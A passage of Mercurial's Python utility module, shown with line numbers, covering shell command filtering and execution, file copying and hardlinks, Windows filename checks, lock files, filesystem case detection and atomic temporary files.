862 862 '''filter string S through command CMD, returning its output'''
863 863 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
864 864 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
865 865 pout, perr = p.communicate(s)
866 866 return pout
867 867
868 868 def tempfilter(s, cmd):
869 869 '''filter string S through a pair of temporary files with CMD.
870 870 CMD is used as a template to create the real command to be run,
871 871 with the strings INFILE and OUTFILE replaced by the real names of
872 872 the temporary files generated.'''
873 873 inname, outname = None, None
874 874 try:
875 875 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
876 876 fp = os.fdopen(infd, pycompat.sysstr('wb'))
877 877 fp.write(s)
878 878 fp.close()
879 879 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
880 880 os.close(outfd)
881 881 cmd = cmd.replace('INFILE', inname)
882 882 cmd = cmd.replace('OUTFILE', outname)
883 883 code = os.system(cmd)
884 884 if pycompat.sysplatform == 'OpenVMS' and code & 1:
885 885 code = 0
886 886 if code:
887 887 raise Abort(_("command '%s' failed: %s") %
888 888 (cmd, explainexit(code)))
889 889 return readfile(outname)
890 890 finally:
891 891 try:
892 892 if inname:
893 893 os.unlink(inname)
894 894 except OSError:
895 895 pass
896 896 try:
897 897 if outname:
898 898 os.unlink(outname)
899 899 except OSError:
900 900 pass
901 901
902 902 filtertable = {
903 903 'tempfile:': tempfilter,
904 904 'pipe:': pipefilter,
905 905 }
906 906
907 907 def filter(s, cmd):
908 908 "filter a string through a command that transforms its input to its output"
909 909 for name, fn in filtertable.iteritems():
910 910 if cmd.startswith(name):
911 911 return fn(s, cmd[len(name):].lstrip())
912 912 return pipefilter(s, cmd)
913 913
914 914 def binary(s):
915 915 """return true if a string is binary data"""
916 916 return bool(s and '\0' in s)
917 917
918 918 def increasingchunks(source, min=1024, max=65536):
919 919 '''return no less than min bytes per chunk while data remains,
920 920 doubling min after each chunk until it reaches max'''
921 921 def log2(x):
922 922 if not x:
923 923 return 0
924 924 i = 0
925 925 while x:
926 926 x >>= 1
927 927 i += 1
928 928 return i - 1
929 929
930 930 buf = []
931 931 blen = 0
932 932 for chunk in source:
933 933 buf.append(chunk)
934 934 blen += len(chunk)
935 935 if blen >= min:
936 936 if min < max:
937 937 min = min << 1
938 938 nmin = 1 << log2(blen)
939 939 if nmin > min:
940 940 min = nmin
941 941 if min > max:
942 942 min = max
943 943 yield ''.join(buf)
944 944 blen = 0
945 945 buf = []
946 946 if buf:
947 947 yield ''.join(buf)
948 948
949 949 Abort = error.Abort
950 950
951 951 def always(fn):
952 952 return True
953 953
954 954 def never(fn):
955 955 return False
956 956
957 957 def nogc(func):
958 958 """disable garbage collector
959 959
960 960 Python's garbage collector triggers a GC each time a certain number of
961 961 container objects (the number being defined by gc.get_threshold()) are
962 962 allocated even when marked not to be tracked by the collector. Tracking has
963 963 no effect on when GCs are triggered, only on what objects the GC looks
964 964 into. As a workaround, disable GC while building complex (huge)
965 965 containers.
966 966
967 967 This garbage collector issue have been fixed in 2.7. But it still affect
968 968 CPython's performance.
969 969 """
970 970 def wrapper(*args, **kwargs):
971 971 gcenabled = gc.isenabled()
972 972 gc.disable()
973 973 try:
974 974 return func(*args, **kwargs)
975 975 finally:
976 976 if gcenabled:
977 977 gc.enable()
978 978 return wrapper
979 979
980 980 if pycompat.ispypy:
981 981 # PyPy runs slower with gc disabled
982 982 nogc = lambda x: x
983 983
984 984 def pathto(root, n1, n2):
985 985 '''return the relative path from one place to another.
986 986 root should use os.sep to separate directories
987 987 n1 should use os.sep to separate directories
988 988 n2 should use "/" to separate directories
989 989 returns an os.sep-separated path.
990 990
991 991 If n1 is a relative path, it's assumed it's
992 992 relative to root.
993 993 n2 should always be relative to root.
994 994 '''
995 995 if not n1:
996 996 return localpath(n2)
997 997 if os.path.isabs(n1):
998 998 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
999 999 return os.path.join(root, localpath(n2))
1000 1000 n2 = '/'.join((pconvert(root), n2))
1001 1001 a, b = splitpath(n1), n2.split('/')
1002 1002 a.reverse()
1003 1003 b.reverse()
1004 1004 while a and b and a[-1] == b[-1]:
1005 1005 a.pop()
1006 1006 b.pop()
1007 1007 b.reverse()
1008 1008 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1009 1009
1010 1010 def mainfrozen():
1011 1011 """return True if we are a frozen executable.
1012 1012
1013 1013 The code supports py2exe (most common, Windows only) and tools/freeze
1014 1014 (portable, not much used).
1015 1015 """
1016 1016 return (safehasattr(sys, "frozen") or # new py2exe
1017 1017 safehasattr(sys, "importers") or # old py2exe
1018 1018 imp.is_frozen(u"__main__")) # tools/freeze
1019 1019
1020 1020 # the location of data files matching the source code
1021 1021 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1022 1022 # executable version (py2exe) doesn't support __file__
1023 1023 datapath = os.path.dirname(pycompat.sysexecutable)
1024 1024 else:
1025 1025 datapath = os.path.dirname(pycompat.fsencode(__file__))
1026 1026
1027 1027 i18n.setdatapath(datapath)
1028 1028
1029 1029 _hgexecutable = None
1030 1030
1031 1031 def hgexecutable():
1032 1032 """return location of the 'hg' executable.
1033 1033
1034 1034 Defaults to $HG or 'hg' in the search path.
1035 1035 """
1036 1036 if _hgexecutable is None:
1037 1037 hg = encoding.environ.get('HG')
1038 1038 mainmod = sys.modules[pycompat.sysstr('__main__')]
1039 1039 if hg:
1040 1040 _sethgexecutable(hg)
1041 1041 elif mainfrozen():
1042 1042 if getattr(sys, 'frozen', None) == 'macosx_app':
1043 1043 # Env variable set by py2app
1044 1044 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1045 1045 else:
1046 1046 _sethgexecutable(pycompat.sysexecutable)
1047 1047 elif (os.path.basename(
1048 1048 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1049 1049 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1050 1050 else:
1051 1051 exe = findexe('hg') or os.path.basename(sys.argv[0])
1052 1052 _sethgexecutable(exe)
1053 1053 return _hgexecutable
1054 1054
1055 1055 def _sethgexecutable(path):
1056 1056 """set location of the 'hg' executable"""
1057 1057 global _hgexecutable
1058 1058 _hgexecutable = path
1059 1059
1060 1060 def _isstdout(f):
1061 1061 fileno = getattr(f, 'fileno', None)
1062 1062 return fileno and fileno() == sys.__stdout__.fileno()
1063 1063
1064 1064 def shellenviron(environ=None):
1065 1065 """return environ with optional override, useful for shelling out"""
1066 1066 def py2shell(val):
1067 1067 'convert python object into string that is useful to shell'
1068 1068 if val is None or val is False:
1069 1069 return '0'
1070 1070 if val is True:
1071 1071 return '1'
1072 1072 return str(val)
1073 1073 env = dict(encoding.environ)
1074 1074 if environ:
1075 1075 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1076 1076 env['HG'] = hgexecutable()
1077 1077 return env
1078 1078
1079 1079 def system(cmd, environ=None, cwd=None, out=None):
1080 1080 '''enhanced shell command execution.
1081 1081 run with environment maybe modified, maybe in different dir.
1082 1082
1083 1083 if out is specified, it is assumed to be a file-like object that has a
1084 1084 write() method. stdout and stderr will be redirected to out.'''
1085 1085 try:
1086 1086 stdout.flush()
1087 1087 except Exception:
1088 1088 pass
1089 1089 cmd = quotecommand(cmd)
1090 1090 env = shellenviron(environ)
1091 1091 if out is None or _isstdout(out):
1092 1092 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1093 1093 env=env, cwd=cwd)
1094 1094 else:
1095 1095 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1096 1096 env=env, cwd=cwd, stdout=subprocess.PIPE,
1097 1097 stderr=subprocess.STDOUT)
1098 1098 for line in iter(proc.stdout.readline, ''):
1099 1099 out.write(line)
1100 1100 proc.wait()
1101 1101 rc = proc.returncode
1102 1102 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1103 1103 rc = 0
1104 1104 return rc
1105 1105
1106 1106 def checksignature(func):
1107 1107 '''wrap a function with code to check for calling errors'''
1108 1108 def check(*args, **kwargs):
1109 1109 try:
1110 1110 return func(*args, **kwargs)
1111 1111 except TypeError:
1112 1112 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1113 1113 raise error.SignatureError
1114 1114 raise
1115 1115
1116 1116 return check
1117 1117
1118 1118 # a whilelist of known filesystems where hardlink works reliably
1119 1119 _hardlinkfswhitelist = {
1120 1120 'btrfs',
1121 1121 'ext2',
1122 1122 'ext3',
1123 1123 'ext4',
1124 1124 'hfs',
1125 1125 'jfs',
1126 1126 'reiserfs',
1127 1127 'tmpfs',
1128 1128 'ufs',
1129 1129 'xfs',
1130 1130 'zfs',
1131 1131 }
1132 1132
1133 1133 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1134 1134 '''copy a file, preserving mode and optionally other stat info like
1135 1135 atime/mtime
1136 1136
1137 1137 checkambig argument is used with filestat, and is useful only if
1138 1138 destination file is guarded by any lock (e.g. repo.lock or
1139 1139 repo.wlock).
1140 1140
1141 1141 copystat and checkambig should be exclusive.
1142 1142 '''
1143 1143 assert not (copystat and checkambig)
1144 1144 oldstat = None
1145 1145 if os.path.lexists(dest):
1146 1146 if checkambig:
1147 1147 oldstat = checkambig and filestat.frompath(dest)
1148 1148 unlink(dest)
1149 1149 if hardlink:
1150 1150 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1151 1151 # unless we are confident that dest is on a whitelisted filesystem.
1152 1152 try:
1153 1153 fstype = getfstype(os.path.dirname(dest))
1154 1154 except OSError:
1155 1155 fstype = None
1156 1156 if fstype not in _hardlinkfswhitelist:
1157 1157 hardlink = False
1158 1158 if hardlink:
1159 1159 try:
1160 1160 oslink(src, dest)
1161 1161 return
1162 1162 except (IOError, OSError):
1163 1163 pass # fall back to normal copy
1164 1164 if os.path.islink(src):
1165 1165 os.symlink(os.readlink(src), dest)
1166 1166 # copytime is ignored for symlinks, but in general copytime isn't needed
1167 1167 # for them anyway
1168 1168 else:
1169 1169 try:
1170 1170 shutil.copyfile(src, dest)
1171 1171 if copystat:
1172 1172 # copystat also copies mode
1173 1173 shutil.copystat(src, dest)
1174 1174 else:
1175 1175 shutil.copymode(src, dest)
1176 1176 if oldstat and oldstat.stat:
1177 1177 newstat = filestat.frompath(dest)
1178 1178 if newstat.isambig(oldstat):
1179 1179 # stat of copied file is ambiguous to original one
1180 1180 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1181 1181 os.utime(dest, (advanced, advanced))
1182 1182 except shutil.Error as inst:
1183 1183 raise Abort(str(inst))
1184 1184
1185 1185 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1186 1186 """Copy a directory tree using hardlinks if possible."""
1187 1187 num = 0
1188 1188
1189 1189 gettopic = lambda: hardlink and _('linking') or _('copying')
1190 1190
1191 1191 if os.path.isdir(src):
1192 1192 if hardlink is None:
1193 1193 hardlink = (os.stat(src).st_dev ==
1194 1194 os.stat(os.path.dirname(dst)).st_dev)
1195 1195 topic = gettopic()
1196 1196 os.mkdir(dst)
1197 1197 for name, kind in listdir(src):
1198 1198 srcname = os.path.join(src, name)
1199 1199 dstname = os.path.join(dst, name)
1200 1200 def nprog(t, pos):
1201 1201 if pos is not None:
1202 1202 return progress(t, pos + num)
1203 1203 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1204 1204 num += n
1205 1205 else:
1206 1206 if hardlink is None:
1207 1207 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1208 1208 os.stat(os.path.dirname(dst)).st_dev)
1209 1209 topic = gettopic()
1210 1210
1211 1211 if hardlink:
1212 1212 try:
1213 1213 oslink(src, dst)
1214 1214 except (IOError, OSError):
1215 1215 hardlink = False
1216 1216 shutil.copy(src, dst)
1217 1217 else:
1218 1218 shutil.copy(src, dst)
1219 1219 num += 1
1220 1220 progress(topic, num)
1221 1221 progress(topic, None)
1222 1222
1223 1223 return hardlink, num
1224 1224
1225 1225 _winreservednames = b'''con prn aux nul
1226 1226 com1 com2 com3 com4 com5 com6 com7 com8 com9
1227 1227 lpt1 lpt2 lpt3 lpt4 lpt5 lpt6 lpt7 lpt8 lpt9'''.split()
1228 1228 _winreservedchars = ':*?"<>|'
1229 1229 def checkwinfilename(path):
1230 1230 r'''Check that the base-relative path is a valid filename on Windows.
1231 1231 Returns None if the path is ok, or a UI string describing the problem.
1232 1232
1233 1233 >>> checkwinfilename("just/a/normal/path")
1234 1234 >>> checkwinfilename("foo/bar/con.xml")
1235 1235 "filename contains 'con', which is reserved on Windows"
1236 1236 >>> checkwinfilename("foo/con.xml/bar")
1237 1237 "filename contains 'con', which is reserved on Windows"
1238 1238 >>> checkwinfilename("foo/bar/xml.con")
1239 1239 >>> checkwinfilename("foo/bar/AUX/bla.txt")
1240 1240 "filename contains 'AUX', which is reserved on Windows"
1241 1241 >>> checkwinfilename("foo/bar/bla:.txt")
1242 1242 "filename contains ':', which is reserved on Windows"
1243 1243 >>> checkwinfilename("foo/bar/b\07la.txt")
1244 1244 "filename contains '\\x07', which is invalid on Windows"
1245 1245 >>> checkwinfilename("foo/bar/bla ")
1246 1246 "filename ends with ' ', which is not allowed on Windows"
1247 1247 >>> checkwinfilename("../bar")
1248 1248 >>> checkwinfilename("foo\\")
1249 1249 "filename ends with '\\', which is invalid on Windows"
1250 1250 >>> checkwinfilename("foo\\/bar")
1251 1251 "directory name ends with '\\', which is invalid on Windows"
1252 1252 '''
1253 1253 if path.endswith('\\'):
1254 1254 return _("filename ends with '\\', which is invalid on Windows")
1255 1255 if '\\/' in path:
1256 1256 return _("directory name ends with '\\', which is invalid on Windows")
1257 1257 for n in path.replace('\\', '/').split('/'):
1258 1258 if not n:
1259 1259 continue
1260 1260 for c in _filenamebytestr(n):
1261 1261 if c in _winreservedchars:
1262 1262 return _("filename contains '%s', which is reserved "
1263 1263 "on Windows") % c
1264 1264 if ord(c) <= 31:
1265 1265 return _("filename contains %r, which is invalid "
1266 1266 "on Windows") % c
1267 1267 base = n.split('.')[0]
1268 1268 if base and base.lower() in _winreservednames:
1269 1269 return _("filename contains '%s', which is reserved "
1270 1270 "on Windows") % base
1271 1271 t = n[-1]
1272 1272 if t in '. ' and n not in '..':
1273 1273 return _("filename ends with '%s', which is not allowed "
1274 1274 "on Windows") % t
1275 1275
1276 1276 if pycompat.osname == 'nt':
1277 1277 checkosfilename = checkwinfilename
1278 1278 timer = time.clock
1279 1279 else:
1280 1280 checkosfilename = platform.checkosfilename
1281 1281 timer = time.time
1282 1282
1283 1283 if safehasattr(time, "perf_counter"):
1284 1284 timer = time.perf_counter
1285 1285
1286 1286 def makelock(info, pathname):
1287 1287 try:
1288 1288 return os.symlink(info, pathname)
1289 1289 except OSError as why:
1290 1290 if why.errno == errno.EEXIST:
1291 1291 raise
1292 1292 except AttributeError: # no symlink in os
1293 1293 pass
1294 1294
1295 1295 ld = os.open(pathname, os.O_CREAT | os.O_WRONLY | os.O_EXCL)
1296 1296 os.write(ld, info)
1297 1297 os.close(ld)
1298 1298
1299 1299 def readlock(pathname):
1300 1300 try:
1301 1301 return os.readlink(pathname)
1302 1302 except OSError as why:
1303 1303 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1304 1304 raise
1305 1305 except AttributeError: # no symlink in os
1306 1306 pass
1307 1307 fp = posixfile(pathname)
1308 1308 r = fp.read()
1309 1309 fp.close()
1310 1310 return r
1311 1311
1312 1312 def fstat(fp):
1313 1313 '''stat file object that may not have fileno method.'''
1314 1314 try:
1315 1315 return os.fstat(fp.fileno())
1316 1316 except AttributeError:
1317 1317 return os.stat(fp.name)
1318 1318
1319 1319 # File system features
1320 1320
1321 1321 def fscasesensitive(path):
1322 1322 """
1323 1323 Return true if the given path is on a case-sensitive filesystem
1324 1324
1325 1325 Requires a path (like /foo/.hg) ending with a foldable final
1326 1326 directory component.
1327 1327 """
1328 1328 s1 = os.lstat(path)
1329 1329 d, b = os.path.split(path)
1330 1330 b2 = b.upper()
1331 1331 if b == b2:
1332 1332 b2 = b.lower()
1333 1333 if b == b2:
1334 1334 return True # no evidence against case sensitivity
1335 1335 p2 = os.path.join(d, b2)
1336 1336 try:
1337 1337 s2 = os.lstat(p2)
1338 1338 if s2 == s1:
1339 1339 return False
1340 1340 return True
1341 1341 except OSError:
1342 1342 return True
1343 1343
1344 1344 try:
1345 1345 import re2
1346 1346 _re2 = None
1347 1347 except ImportError:
1348 1348 _re2 = False
1349 1349
1350 1350 class _re(object):
1351 1351 def _checkre2(self):
1352 1352 global _re2
1353 1353 try:
1354 1354 # check if match works, see issue3964
1355 1355 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1356 1356 except ImportError:
1357 1357 _re2 = False
1358 1358
1359 1359 def compile(self, pat, flags=0):
1360 1360 '''Compile a regular expression, using re2 if possible
1361 1361
1362 1362 For best performance, use only re2-compatible regexp features. The
1363 1363 only flags from the re module that are re2-compatible are
1364 1364 IGNORECASE and MULTILINE.'''
1365 1365 if _re2 is None:
1366 1366 self._checkre2()
1367 1367 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1368 1368 if flags & remod.IGNORECASE:
1369 1369 pat = '(?i)' + pat
1370 1370 if flags & remod.MULTILINE:
1371 1371 pat = '(?m)' + pat
1372 1372 try:
1373 1373 return re2.compile(pat)
1374 1374 except re2.error:
1375 1375 pass
1376 1376 return remod.compile(pat, flags)
1377 1377
1378 1378 @propertycache
1379 1379 def escape(self):
1380 1380 '''Return the version of escape corresponding to self.compile.
1381 1381
1382 1382 This is imperfect because whether re2 or re is used for a particular
1383 1383 function depends on the flags, etc, but it's the best we can do.
1384 1384 '''
1385 1385 global _re2
1386 1386 if _re2 is None:
1387 1387 self._checkre2()
1388 1388 if _re2:
1389 1389 return re2.escape
1390 1390 else:
1391 1391 return remod.escape
1392 1392
1393 1393 re = _re()
1394 1394
1395 1395 _fspathcache = {}
1396 1396 def fspath(name, root):
1397 1397 '''Get name in the case stored in the filesystem
1398 1398
1399 1399 The name should be relative to root, and be normcase-ed for efficiency.
1400 1400
1401 1401 Note that this function is unnecessary, and should not be
1402 1402 called, for case-sensitive filesystems (simply because it's expensive).
1403 1403
1404 1404 The root should be normcase-ed, too.
1405 1405 '''
1406 1406 def _makefspathcacheentry(dir):
1407 1407 return dict((normcase(n), n) for n in os.listdir(dir))
1408 1408
1409 1409 seps = pycompat.ossep
1410 1410 if pycompat.osaltsep:
1411 1411 seps = seps + pycompat.osaltsep
1412 1412 # Protect backslashes. This gets silly very quickly.
1413 1413 seps.replace('\\','\\\\')
1414 1414 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1415 1415 dir = os.path.normpath(root)
1416 1416 result = []
1417 1417 for part, sep in pattern.findall(name):
1418 1418 if sep:
1419 1419 result.append(sep)
1420 1420 continue
1421 1421
1422 1422 if dir not in _fspathcache:
1423 1423 _fspathcache[dir] = _makefspathcacheentry(dir)
1424 1424 contents = _fspathcache[dir]
1425 1425
1426 1426 found = contents.get(part)
1427 1427 if not found:
1428 1428 # retry "once per directory" per "dirstate.walk" which
1429 1429 # may take place for each patches of "hg qpush", for example
1430 1430 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1431 1431 found = contents.get(part)
1432 1432
1433 1433 result.append(found or part)
1434 1434 dir = os.path.join(dir, part)
1435 1435
1436 1436 return ''.join(result)
1437 1437
1438 1438 def getfstype(dirpath):
1439 1439 '''Get the filesystem type name from a directory (best-effort)
1440 1440
1441 1441 Returns None if we are unsure. Raises OSError on ENOENT, EPERM, etc.
1442 1442 '''
1443 1443 return getattr(osutil, 'getfstype', lambda x: None)(dirpath)
1444 1444
1445 1445 def checknlink(testfile):
1446 1446 '''check whether hardlink count reporting works properly'''
1447 1447
1448 1448 # testfile may be open, so we need a separate file for checking to
1449 1449 # work around issue2543 (or testfile may get lost on Samba shares)
1450 1450 f1 = testfile + ".hgtmp1"
1451 1451 if os.path.lexists(f1):
1452 1452 return False
1453 1453 try:
1454 1454 posixfile(f1, 'w').close()
1455 1455 except IOError:
1456 1456 try:
1457 1457 os.unlink(f1)
1458 1458 except OSError:
1459 1459 pass
1460 1460 return False
1461 1461
1462 1462 f2 = testfile + ".hgtmp2"
1463 1463 fd = None
1464 1464 try:
1465 1465 oslink(f1, f2)
1466 1466 # nlinks() may behave differently for files on Windows shares if
1467 1467 # the file is open.
1468 1468 fd = posixfile(f2)
1469 1469 return nlinks(f2) > 1
1470 1470 except OSError:
1471 1471 return False
1472 1472 finally:
1473 1473 if fd is not None:
1474 1474 fd.close()
1475 1475 for f in (f1, f2):
1476 1476 try:
1477 1477 os.unlink(f)
1478 1478 except OSError:
1479 1479 pass
1480 1480
1481 1481 def endswithsep(path):
1482 1482 '''Check path ends with os.sep or os.altsep.'''
1483 1483 return (path.endswith(pycompat.ossep)
1484 1484 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1485 1485
1486 1486 def splitpath(path):
1487 1487 '''Split path by os.sep.
1488 1488 Note that this function does not use os.altsep because this is
1489 1489 an alternative of simple "xxx.split(os.sep)".
1490 1490 It is recommended to use os.path.normpath() before using this
1491 1491 function if need.'''
1492 1492 return path.split(pycompat.ossep)
1493 1493
1494 1494 def gui():
1495 1495 '''Are we running in a GUI?'''
1496 1496 if pycompat.sysplatform == 'darwin':
1497 1497 if 'SSH_CONNECTION' in encoding.environ:
1498 1498 # handle SSH access to a box where the user is logged in
1499 1499 return False
1500 1500 elif getattr(osutil, 'isgui', None):
1501 1501 # check if a CoreGraphics session is available
1502 1502 return osutil.isgui()
1503 1503 else:
1504 1504 # pure build; use a safe default
1505 1505 return True
1506 1506 else:
1507 1507 return pycompat.osname == "nt" or encoding.environ.get("DISPLAY")
1508 1508
1509 1509 def mktempcopy(name, emptyok=False, createmode=None):
1510 1510 """Create a temporary file with the same contents from name
1511 1511
1512 1512 The permission bits are copied from the original file.
1513 1513
1514 1514 If the temporary file is going to be truncated immediately, you
1515 1515 can use emptyok=True as an optimization.
1516 1516
1517 1517 Returns the name of the temporary file.
1518 1518 """
1519 1519 d, fn = os.path.split(name)
1520 1520 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, dir=d)
1521 1521 os.close(fd)
1522 1522 # Temporary files are created with mode 0600, which is usually not
1523 1523 # what we want. If the original file already exists, just copy
1524 1524 # its mode. Otherwise, manually obey umask.
1525 1525 copymode(name, temp, createmode)
1526 1526 if emptyok:
1527 1527 return temp
1528 1528 try:
1529 1529 try:
1530 1530 ifp = posixfile(name, "rb")
1531 1531 except IOError as inst:
1532 1532 if inst.errno == errno.ENOENT:
1533 1533 return temp
1534 1534 if not getattr(inst, 'filename', None):
1535 1535 inst.filename = name
1536 1536 raise
1537 1537 ofp = posixfile(temp, "wb")
1538 1538 for chunk in filechunkiter(ifp):
1539 1539 ofp.write(chunk)
1540 1540 ifp.close()
1541 1541 ofp.close()
1542 1542 except: # re-raises
1543 1543 try: os.unlink(temp)
1544 1544 except OSError: pass
1545 1545 raise
1546 1546 return temp
1547 1547
1548 1548 class filestat(object):
1549 1549 """help to exactly detect change of a file
1550 1550
1551 1551 'stat' attribute is result of 'os.stat()' if specified 'path'
1552 1552 exists. Otherwise, it is None. This can avoid preparative
1553 1553 'exists()' examination on client side of this class.
1554 1554 """
1555 1555 def __init__(self, stat):
1556 1556 self.stat = stat
1557 1557
1558 1558 @classmethod
1559 1559 def frompath(cls, path):
1560 1560 try:
1561 1561 stat = os.stat(path)
1562 1562 except OSError as err:
1563 1563 if err.errno != errno.ENOENT:
1564 1564 raise
1565 1565 stat = None
1566 1566 return cls(stat)
1567 1567
1568 1568 @classmethod
1569 1569 def fromfp(cls, fp):
1570 1570 stat = os.fstat(fp.fileno())
1571 1571 return cls(stat)
1572 1572
1573 1573 __hash__ = object.__hash__
1574 1574
1575 1575 def __eq__(self, old):
1576 1576 try:
1577 1577 # if ambiguity between stat of new and old file is
1578 1578 # avoided, comparison of size, ctime and mtime is enough
1579 1579 # to exactly detect change of a file regardless of platform
1580 1580 return (self.stat.st_size == old.stat.st_size and
1581 1581 self.stat.st_ctime == old.stat.st_ctime and
1582 1582 self.stat.st_mtime == old.stat.st_mtime)
1583 1583 except AttributeError:
1584 1584 pass
1585 1585 try:
1586 1586 return self.stat is None and old.stat is None
1587 1587 except AttributeError:
1588 1588 return False
1589 1589
1590 1590 def isambig(self, old):
1591 1591 """Examine whether new (= self) stat is ambiguous against old one
1592 1592
1593 1593 "S[N]" below means stat of a file at N-th change:
1594 1594
1595 1595 - S[n-1].ctime < S[n].ctime: can detect change of a file
1596 1596 - S[n-1].ctime == S[n].ctime
1597 1597 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1598 1598 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
1599 1599 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
1600 1600 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
1601 1601
1602 1602 Case (*2) above means that a file was changed twice or more at
1603 1603 same time in sec (= S[n-1].ctime), and comparison of timestamp
1604 1604 is ambiguous.
1605 1605
1606 1606 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
1607 1607 timestamp is ambiguous".
1608 1608
1609 1609 But advancing mtime only in case (*2) doesn't work as
1610 1610 expected, because naturally advanced S[n].mtime in case (*1)
1611 1611 might be equal to manually advanced S[n-1 or earlier].mtime.
1612 1612
1613 1613 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
1614 1614 treated as ambiguous regardless of mtime, to avoid overlooking
1615 1615 by confliction between such mtime.
1616 1616
1617 1617 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
1618 1618 S[n].mtime", even if size of a file isn't changed.
1619 1619 """
1620 1620 try:
1621 1621 return (self.stat.st_ctime == old.stat.st_ctime)
1622 1622 except AttributeError:
1623 1623 return False
1624 1624
1625 1625 def avoidambig(self, path, old):
1626 1626 """Change file stat of specified path to avoid ambiguity
1627 1627
1628 1628 'old' should be previous filestat of 'path'.
1629 1629
1630 1630 This skips avoiding ambiguity, if a process doesn't have
1631 1631 appropriate privileges for 'path'. This returns False in this
1632 1632 case.
1633 1633
1634 1634 Otherwise, this returns True, as "ambiguity is avoided".
1635 1635 """
1636 1636 advanced = (old.stat.st_mtime + 1) & 0x7fffffff
1637 1637 try:
1638 1638 os.utime(path, (advanced, advanced))
1639 1639 except OSError as inst:
1640 1640 if inst.errno == errno.EPERM:
1641 1641 # utime() on the file created by another user causes EPERM,
1642 1642 # if a process doesn't have appropriate privileges
1643 1643 return False
1644 1644 raise
1645 1645 return True
1646 1646
1647 1647 def __ne__(self, other):
1648 1648 return not self == other
1649 1649
1650 1650 class atomictempfile(object):
1651 1651 '''writable file object that atomically updates a file
1652 1652
1653 1653 All writes will go to a temporary copy of the original file. Call
1654 1654 close() when you are done writing, and atomictempfile will rename
1655 1655 the temporary copy to the original name, making the changes
1656 1656 visible. If the object is destroyed without being closed, all your
1657 1657 writes are discarded.
1658 1658
1659 1659 checkambig argument of constructor is used with filestat, and is
1660 1660 useful only if target file is guarded by any lock (e.g. repo.lock
1661 1661 or repo.wlock).
1662 1662 '''
1663 1663 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
1664 1664 self.__name = name # permanent name
1665 1665 self._tempname = mktempcopy(name, emptyok=('w' in mode),
1666 1666 createmode=createmode)
1667 1667 self._fp = posixfile(self._tempname, mode)
1668 1668 self._checkambig = checkambig
1669 1669
1670 1670 # delegated methods
1671 1671 self.read = self._fp.read
1672 1672 self.write = self._fp.write
1673 1673 self.seek = self._fp.seek
1674 1674 self.tell = self._fp.tell
1675 1675 self.fileno = self._fp.fileno
1676 1676
1677 1677 def close(self):
1678 1678 if not self._fp.closed:
1679 1679 self._fp.close()
1680 1680 filename = localpath(self.__name)
1681 1681 oldstat = self._checkambig and filestat.frompath(filename)
1682 1682 if oldstat and oldstat.stat:
1683 1683 rename(self._tempname, filename)
1684 1684 newstat = filestat.frompath(filename)
1685 1685 if newstat.isambig(oldstat):
1686 1686 # stat of changed file is ambiguous to original one
1687 1687 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1688 1688 os.utime(filename, (advanced, advanced))
1689 1689 else:
1690 1690 rename(self._tempname, filename)
1691 1691
1692 1692 def discard(self):
1693 1693 if not self._fp.closed:
1694 1694 try:
1695 1695 os.unlink(self._tempname)
1696 1696 except OSError:
1697 1697 pass
1698 1698 self._fp.close()
1699 1699
1700 1700 def __del__(self):
1701 1701 if safehasattr(self, '_fp'): # constructor actually did something
1702 1702 self.discard()
1703 1703
1704 1704 def __enter__(self):
1705 1705 return self
1706 1706
1707 1707 def __exit__(self, exctype, excvalue, traceback):
1708 1708 if exctype is not None:
1709 1709 self.discard()
1710 1710 else:
1711 1711 self.close()
1712 1712
1713 1713 def unlinkpath(f, ignoremissing=False):
1714 1714 """unlink and remove the directory if it is empty"""
1715 1715 if ignoremissing:
1716 1716 tryunlink(f)
1717 1717 else:
1718 1718 unlink(f)
1719 1719 # try removing directories that might now be empty
1720 1720 try:
1721 1721 removedirs(os.path.dirname(f))
1722 1722 except OSError:
1723 1723 pass
1724 1724
1725 1725 def tryunlink(f):
1726 1726 """Attempt to remove a file, ignoring ENOENT errors."""
1727 1727 try:
1728 1728 unlink(f)
1729 1729 except OSError as e:
1730 1730 if e.errno != errno.ENOENT:
1731 1731 raise
1732 1732
1733 1733 def makedirs(name, mode=None, notindexed=False):
1734 1734 """recursive directory creation with parent mode inheritance
1735 1735
1736 1736 Newly created directories are marked as "not to be indexed by
1737 1737 the content indexing service", if ``notindexed`` is specified
1738 1738 for "write" mode access.
1739 1739 """
1740 1740 try:
1741 1741 makedir(name, notindexed)
1742 1742 except OSError as err:
1743 1743 if err.errno == errno.EEXIST:
